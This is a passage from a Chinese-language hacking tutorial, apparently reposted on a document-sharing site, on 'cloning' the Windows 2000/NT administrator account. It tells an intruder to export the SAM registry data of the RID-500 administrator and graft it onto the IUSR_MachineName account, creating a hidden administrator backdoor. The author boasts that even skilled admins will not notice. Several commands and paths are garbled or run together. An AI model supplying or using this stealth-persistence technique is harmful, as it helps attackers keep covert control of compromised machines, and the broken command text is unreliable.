二、克隆帐号1...经常看到一些人在入侵一台Windows2000或者WindowsNT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,ShowTimeNow。首先要让大家知道的概念是在Windows2000和WindowsNT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows2000Server。运行一个System的CMDShell(s/scripts/),然后在该CMDShell里面运行regedit/\SAM\SAM\Domains\Account\Users\000001F4这样我们将SID为500的管理员帐号的相关信息导出,,--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),"1F4"修改为"3E9"后执行regedit/(最好使用14位的密码,越像IUSR_MachineName的密码越好)OK,大功告成...这样,我们拥有和默认管理员一样的桌面、一样的Profile.....而且,localgroupadministrators时,看看结果:C:\>puter/domainMembers-------------------------------------------------------------------------------:C:\>user2sidAdministratorS-1-5-21-1004336348-1078145449-854245398-500Numberofsubauthoritiesis5DomainisIDONTKNOWLengthofSIDinmemoryis28bytesTypeofSIDisSidTypeUserC:\>user2sidiusr_machinenameS-1-5-21-1004336348-1078145449-854245398-1001Numberofsubauthoritiesis5DomainisIDONTKNOWLengthofSIDinmemoryis28bytesTypeofSIDisSidTypeUser我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密
克隆帐号PSU和CA的用法 来自淘豆网m.daumloan.com转载请标明出处.